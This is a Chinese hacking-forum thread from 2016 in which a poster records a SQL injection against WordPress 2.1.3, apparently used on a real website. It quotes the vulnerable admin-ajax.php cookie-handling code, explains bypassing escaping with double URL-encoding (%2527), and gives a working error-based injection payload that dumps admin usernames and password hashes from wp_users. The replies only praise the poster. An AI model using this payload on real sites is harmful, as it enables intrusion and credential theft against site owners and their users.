Free_小东 发表于 2016-11-3 18:50:38

记录一个WordPress 2.1.3注入

本帖最后由 Free_小东 于 2016-11-3 18:54 编辑

---------------------------------------------------------------------------------------------------------------
*                                                                                                                                                               *
*                              本文来自08内部分享,未经允许,不得转载.                     *
*                                                                                                                                                                *
---------------------------------------------------------------------------------------------------------------


网站程序用的是 WordPress 2.1.3 ,于是我就在网上搜了漏洞 发现了个 sql注入
链接:http://www.bitscn.com/network/security/200709/110036.html
文章里给了个盲注exp 不好使 没几次暴出来的密码都使不一样 囧.
决定还是自己动手吧 然后看了下文章里的分析

function check_ajax_referer() {
$cookie = explode('; ', urldecode(empty($_POST['cookie']) ?
$_GET['cookie'] : $_POST['cookie'])); // AJAX scripts must pass
cookie=document.cookie
foreach ( $cookie as $tasty ) {
if ( false !== strpos($tasty, USER_COOKIE) )
$user = substr(strstr($tasty, '='), 1);
if ( false !== strpos($tasty, PASS_COOKIE) )
$pass = substr(strstr($tasty, '='), 1);
}
if ( !wp_login( $user, $pass, true ) )
die('-1')


http://www.0-f.org/wp-content/uploads/2014/12/225233uelo8jnbr8oe499w.jpg

我们 通过 strpos($tasty, USER_COOKIE) 和 strpos($tasty, PASS_COOKIE) 的验证就可以了 USER_COOKIE和PASS_COOKIE都是常量
可以看到上图get_option(‘siteurl’)是从数字库中读网站地址 在加一次md5值就可以通过验证了

http://www.0-f.org/wp-content/uploads/2014/12/230115qtx388uamrfz3crz-1024x359.jpg

知道这个后我们来构造下

因为用了urldecode(),我们用%2527来绕过wp做的转义限制

位置代码:
if ( !$user = $wpdb->get_row("SELECT * FROM $wpdb->users WHERE user_login = '$user_login'") )
            return false;

exp:

    /wp-admin/admin-ajax.php
    cookie=wordpressuser_md5(网站url地址)=aa%2527 and(select 1 from(select count(*),concat((select concat(user_login,0x5e,user_pass,0x5e) from wp_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)– n; wordpresspass_md5(网站url地址)=dddddd

http://www.0-f.org/wp-content/uploads/2014/12/233021n497jm7j7kzthzm4.jpg

wuyan 发表于 2016-11-3 19:00:29

666,小东果然厉害

blackfish 发表于 2016-11-3 19:04:16

回复看看大牛作品

Free_小东 发表于 2016-11-3 19:17:43

RE: 记录一个WordPress 2.1.3注入

wuyan 发表于 2016-11-3 19:00
666,小东果然厉害

内部分享的

ttl255 发表于 2016-11-6 22:35:28

东哥我当你小弟可好 QAQ
页: [1]
查看完整版本: 记录一个WordPress 2.1.3注入